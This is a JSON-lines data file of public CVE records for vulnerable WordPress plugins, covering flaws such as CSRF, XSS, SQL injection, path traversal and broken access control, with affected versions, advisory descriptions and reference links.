{"CVE_ID":"CVE-2025-6214","slug":"omnishop","versionImpact":"1.0.9","description":"The Omnishop plugin for WordPress is vulnerable to Cross-Site Request Forgery on its \/users\/delete REST route in all versions up to, and including, 1.0.9. The route\u2019s permission_callback only verifies that the requester is logged in, but fails to require any nonce or other proof of intent. This makes it possible for unauthenticated attackers to delete arbitrary user accounts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/omnishop\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/omnishop\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e7c936b8-3132-45e1-92ed-32ecdc9cbb1e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e7c936b8-3132-45e1-92ed-32ecdc9cbb1e?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2180","slug":"woocommerce-gateway-certification-de-facture-et-gestion-de-pdf-kiwiz","versionImpact":"2.1.3","description":"The KIWIZ Invoices Certification & PDF System WordPress plugin through 2.1.3 does not validate the path of files to be downloaded, which could allow unauthenticated attackers to read\/download arbitrary files, as well as perform PHAR unserialization (assuming they can upload a file on the server)","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/4d3b90d8-8a6d-4b72-8bc7-21f861259a1b\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/4d3b90d8-8a6d-4b72-8bc7-21f861259a1b\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2558","slug":"currency-switcher","versionImpact":"1.1.9","description":"The WPCS \u2013 WordPress Currency Switcher Professional plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's wpcs_current_currency shortcode in versions up to, and including, 1.1.9 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/be054481-89b4-47d8-ad06-8622edea367f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/be054481-89b4-47d8-ad06-8622edea367f?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2911049\\\/currency-switcher\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2911049\\\/currency-switcher\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-4407","slug":"custom-banners","versionImpact":"3.2.2","description":"The Custom Banners plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 3.2.2. This is due to missing or incorrect nonce validation on the saveCustomFields() function. This makes it possible for unauthenticated attackers to save custom fields via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8f4c086d-8209-4212-9d91-67238c1a9143?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8f4c086d-8209-4212-9d91-67238c1a9143?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2473385%40custom-banners&new=2473385%40custom-banners&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2473385%40custom-banners&new=2473385%40custom-banners&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1537","slug":"essential-addons-for-elementor-lite","versionImpact":"5.9.9","description":"The Essential Addons for Elementor \u2013 Best Elementor Templates, Widgets, Kits & WooCommerce Builders plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Data Table widget in all versions up to, and including, 5.9.9 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/81a48c61-4191-4252-9230-9df8fc5e3443?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/81a48c61-4191-4252-9230-9df8fc5e3443?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3037755\\\/essential-addons-for-elementor-lite\\\/tags\\\/5.9.10\\\/includes\\\/Elements\\\/Data_Table.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3037755\\\/essential-addons-for-elementor-lite\\\/tags\\\/5.9.10\\\/includes\\\/Elements\\\/Data_Table.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3643","slug":"newsletter-popup","versionImpact":"1.2","description":"The Newsletter Popup WordPress plugin through 1.2 does not have a CSRF check when deleting a list, which could allow attackers to make logged in admins perform such action via a CSRF attack","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/698277e6-56f9-4688-9a84-c2fa3ea9f7dc\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/698277e6-56f9-4688-9a84-c2fa3ea9f7dc\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3555","slug":"social-link-pages","versionImpact":"1.6.9","description":"The Social Link Pages: link-in-bio landing pages for your social media profiles plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on the import_link_pages() function in all versions up to, and including, 1.6.9. This makes it possible for unauthenticated attackers to inject arbitrary pages and malicious web scripts.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1c025fc0-5dac-4a18-8338-fefb2a1fca5a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1c025fc0-5dac-4a18-8338-fefb2a1fca5a?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/social-link-pages\\\/trunk\\\/inc\\\/Admin.php#L462\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/social-link-pages\\\/trunk\\\/inc\\\/Admin.php#L462\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3561","slug":"custom-field-suite","versionImpact":"2.6.7","description":"The Custom Field Suite plugin for WordPress is vulnerable to SQL Injection via the 'Term' custom field in all versions up to, and including, 2.6.7 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with contributor-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/afc00118-e87e-475a-8ad6-b68d09ee2e44?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/afc00118-e87e-475a-8ad6-b68d09ee2e44?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/mgibbs189\\\/custom-field-suite\\\/blob\\\/963dfcede18ff4ad697498556d9058db07d74fa3\\\/includes\\\/fields\\\/term.php#L58\",\"name\":\"https:\\\/\\\/github.com\\\/mgibbs189\\\/custom-field-suite\\\/blob\\\/963dfcede18ff4ad697498556d9058db07d74fa3\\\/includes\\\/fields\\\/term.php#L58\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/mgibbs189.github.io\\\/custom-field-suite\\\/field-types\\\/term.html\",\"name\":\"https:\\\/\\\/mgibbs189.github.io\\\/custom-field-suite\\\/field-types\\\/term.html\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/en-gb.wordpress.org\\\/plugins\\\/custom-field-suite\\\/\",\"name\":\"https:\\\/\\\/en-gb.wordpress.org\\\/plugins\\\/custom-field-suite\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7356","slug":"zephyr-project-manager","versionImpact":"3.3.100","description":"The Zephyr Project Manager plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018filename\u2019 parameter in all versions up to, and including, 3.3.100 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Subscriber-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d7fa63b7-2e7f-4ed5-96b9-ae06d429af47?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d7fa63b7-2e7f-4ed5-96b9-ae06d429af47?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/zephyr-project-manager\\\/trunk\\\/assets\\\/js\\\/core-admin.js#L2975\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/zephyr-project-manager\\\/trunk\\\/assets\\\/js\\\/core-admin.js#L2975\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/zephyr-project-manager\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/zephyr-project-manager\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3129917\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3129917\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9270","slug":"lenxel-core","versionImpact":"1.1","description":"The Lenxel Core for Lenxel(LNX) LMS plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 1.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2e1d1283-3bd9-458e-81ca-9934b293415a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2e1d1283-3bd9-458e-81ca-9934b293415a?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/lenxel-core\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/lenxel-core\\\/#developers\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11410","slug":"yoo-bar","versionImpact":"2.0.6","description":"The Top and footer bars for announcements, notifications, advertisements, promotions \u2013 YooBar plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Yoo Bar settings in all versions up to, and including, 2.0.6 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/yoo-bar\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/yoo-bar\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/64d6099e-2435-4a3a-9dcc-dba4a674c711?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/64d6099e-2435-4a3a-9dcc-dba4a674c711?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11607","slug":"gtpayment-donation","versionImpact":"1.0.0","description":"The GTPayment Donations WordPress plugin through 1.0.0 does not have a CSRF check in some places, and is missing sanitisation as well as escaping, which could allow attackers to make a logged in admin add Stored XSS payloads via a CSRF attack.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/132b5193-156b-40b8-b5c7-08646e1f6866\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/132b5193-156b-40b8-b5c7-08646e1f6866\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12736","slug":"bu-section-editing","versionImpact":"0.9.9","description":"The BU Section Editing WordPress plugin through 0.9.9 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d3c6a4c1-8358-4f8b-b58d-3f712052668f\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d3c6a4c1-8358-4f8b-b58d-3f712052668f\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2019-25223","slug":"circle-image-slider-with-lightbox","versionImpact":"1.0.4","description":"The Team Circle Image Slider With Lightbox plugin for WordPress is vulnerable to SQL Injection via the 'id' parameter in all versions up to, and including, 1.0.4 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with Administrator-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2061993%40circle-image-slider-with-lightbox&new=2061993%40circle-image-slider-with-lightbox&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2061993%40circle-image-slider-with-lightbox&new=2061993%40circle-image-slider-with-lightbox&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/circle-image-slider-with-lightbox\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/circle-image-slider-with-lightbox\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bd3e30ea-8f58-4895-b78c-fb18c94d5253?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bd3e30ea-8f58-4895-b78c-fb18c94d5253?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-50010","slug":"zapier","versionImpact":"1.5.2","description":"Missing Authorization vulnerability in Zapier Zapier for WordPress allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Zapier for WordPress: from n\/a through 1.5.2.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/zapier\\\/vulnerability\\\/wordpress-zapier-for-wordpress-plugin-1-5-2-broken-access-control-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/zapier\\\/vulnerability\\\/wordpress-zapier-for-wordpress-plugin-1-5-2-broken-access-control-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6190","slug":"realty-portal-agent","versionImpact":"0.3.9","description":"The Realty Portal \u2013 Agent plugin for WordPress is vulnerable to Privilege Escalation due to missing authorization within the rp_user_profile() AJAX handler in versions 0.1.0 through 0.3.9. The handler reads the client-supplied meta key and value pairs from $_POST and passes them directly to update_user_meta() without restricting to a safe whitelist. This makes it possible for authenticated attackers, with Subscriber-level access and above, to overwrite the wp_capabilities meta and grant themselves the administrator role.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/realty-portal-agent\\\/trunk\\\/includes\\\/class-agent-process.php#L494\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/realty-portal-agent\\\/trunk\\\/includes\\\/class-agent-process.php#L494\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/realty-portal-agent\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/realty-portal-agent\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b3adfe9e-ebdf-4a50-b60f-03a606a84ec0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b3adfe9e-ebdf-4a50-b60f-03a606a84ec0?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0253","slug":"real-media-library-lite","versionImpact":"4.18.28","description":"The Real Media Library: Media Library Folder & File Manager plugin for WordPress is vulnerable to Stored Cross-Site Scripting via folder names in versions up to, and including, 4.18.28 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers with author-level permissions and above to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/devowlio.gitbook.io\\\/changelogs\\\/wordpress-plugins\\\/real-media-library\",\"name\":\"https:\\\/\\\/devowlio.gitbook.io\\\/changelogs\\\/wordpress-plugins\\\/real-media-library\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/real-media-library-lite\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/real-media-library-lite\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/950d71ae-29a1-4b71-b74a-b1a5c9f3326e\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/950d71ae-29a1-4b71-b74a-b1a5c9f3326e\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2179","slug":"woocommerce-order-status-change-notifier ","versionImpact":"1.1.0","description":"The WooCommerce Order Status Change Notifier WordPress plugin through 1.1.0 does not have authorisation and CSRF checks when updating order statuses via an AJAX action available to any authenticated user, which could allow low privilege users such as subscribers to update arbitrary order statuses, for example marking them as paid without actually paying for them","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/fbc56973-4225-4f44-8c38-d488e57cd551\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/fbc56973-4225-4f44-8c38-d488e57cd551\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2557","slug":"currency-switcher","versionImpact":"1.1.9","description":"The WPCS \u2013 WordPress Currency Switcher Professional plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the save function in versions up to, and including, 1.1.9. This makes it possible for authenticated attackers, with subscriber-level permissions and above, to edit an arbitrary custom drop-down currency switcher.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2911049\\\/currency-switcher\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2911049\\\/currency-switcher\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d4c79242-5c89-40c0-abcc-c112f7a64a74?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d4c79242-5c89-40c0-abcc-c112f7a64a74?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2020-36750","slug":"ewww-image-optimizer","versionImpact":"5.8.1","description":"The EWWW Image Optimizer plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 5.8.1. This is due to missing or incorrect nonce validation on the ewww_ngg_bulk_init() function. This makes it possible for unauthenticated attackers to perform bulk image optimization via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2417429\\\/ewww-image-optimizer\\\/trunk\\\/classes\\\/class-ewww-nextgen.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2417429\\\/ewww-image-optimizer\\\/trunk\\\/classes\\\/class-ewww-nextgen.php\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8ef33e3c-187a-45d9-9dac-0895dce34216?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8ef33e3c-187a-45d9-9dac-0895dce34216?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2995","slug":"leyka","versionImpact":"3.30.3","description":"The Leyka WordPress plugin through 3.30.3 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/762ff2ca-5c1f-49ae-b83c-1c22bacbc82f\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/762ff2ca-5c1f-49ae-b83c-1c22bacbc82f\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1536","slug":"essential-addons-for-elementor-lite","versionImpact":"5.9.9","description":"The Essential Addons for Elementor \u2013 Best Elementor Templates, Widgets, Kits & WooCommerce Builders plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's event calendar widget in all versions up to, and including, 5.9.9 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/12dc9e63-17bb-4755-be3c-ae8b26edd3cd?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/12dc9e63-17bb-4755-be3c-ae8b26edd3cd?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3037755\\\/essential-addons-for-elementor-lite\\\/tags\\\/5.9.10\\\/includes\\\/Elements\\\/Event_Calendar.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3037755\\\/essential-addons-for-elementor-lite\\\/tags\\\/5.9.10\\\/includes\\\/Elements\\\/Event_Calendar.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3642","slug":"newsletter-popup","versionImpact":"1.2","description":"The Newsletter Popup WordPress plugin through 1.2 does not have CSRF check when deleting subscriber, which could allow attackers to make logged in admins perform such action via a CSRF attack","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/dc44d85f-afe8-4824-95b0-11b9abfb04d8\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/dc44d85f-afe8-4824-95b0-11b9abfb04d8\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
